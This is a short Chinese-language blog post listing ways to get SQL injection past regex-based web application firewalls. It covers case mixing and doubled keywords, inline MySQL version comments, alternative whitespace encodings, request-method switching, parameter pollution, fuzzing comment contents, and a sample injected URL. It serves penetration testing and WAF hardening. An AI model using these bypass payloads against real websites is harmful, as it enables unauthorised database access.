20 02 2020

防火墙,一般都采用正则的方式进行拦截的
常用注释符 #, --+, /xxx/, /!xxx/, /!50000xxx/

一、基础绕过大小写、双重写
如UNion SelECt 1,2,3,
ununionion seselectlect 1,2,3

二、协议层面绕过WAF的检测:
协议未覆盖绕过WAF
1、*请求方式变换 get -> post
*content-type变换
2、参数污染
index.php?id=1&id=2
id=1
id=2
waf可能只检测id=1

三、在/之间插入内容/ 例如:/!50000select/
http://www.hacker.com/news/index.jsp?id=2862' and/%23%0a/1=1–
或者//代替空格 例如:union//select
等价替换:and -> &&、%26%26 、

     or -> ||

空格Blanks=('%09', '%0A', '%0B', '%0C', '%0D', '%a0')

四、fuzz绕waf
例如: 先测试基本:union/**/select

      再测试中间引入特殊字:union/*aaaaa%01bbs*/select
      最后测试注释长度:union/*aaaaaaaaaaaaaaaaaaa*/select

将空格替换/daww!@!#@%/
特殊函数xxx()中间插入 xxx/asdfw!@#¥/()

延伸阅读
  1. Access数据库防注入系统拿实战shell
  2. 对菠菜站的被动信息收集
  3. 攀登计划项目《MRSAC的安全性分析》
  4. Kerberos网络身份认证协议
  5. 黑客技术总结
  6. 反弹shell总结(附实战反弹shell)
  7. 常见解析漏洞总结
  8. 最新总结大部分免杀一句话木马
更多阅读
  1. 上一篇:如何让kali走代理流量提高下载速度
  2. 下一篇:最新总结大部分免杀一句话木马
发表评论 抢沙发